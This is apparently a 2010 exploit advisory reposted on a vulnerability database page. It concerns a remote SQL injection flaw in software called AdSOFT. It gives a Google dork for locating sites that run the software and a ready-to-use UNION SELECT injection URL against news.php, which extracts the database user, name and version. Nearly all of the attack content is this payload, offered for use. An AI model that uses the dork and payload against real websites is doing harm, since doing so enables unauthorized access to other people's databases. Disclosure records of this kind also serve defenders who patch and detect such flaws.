Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25086
HistoryNov 04, 2010 - 12:00 a.m.

Adsoft Remote Sql Injection Vulnerability

2010-11-0400:00:00
vulners.com
50

#------------In The Name Of God------------

Adsoft Remote Sql Injection Vulnerability

###################################
#AUTHOR: md.r00t
#Mail: [email protected]
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:

"Powered by AdSOFT"

###################################

Exploit:

www.site.com/news.php?id=-999//union//select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6–

####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team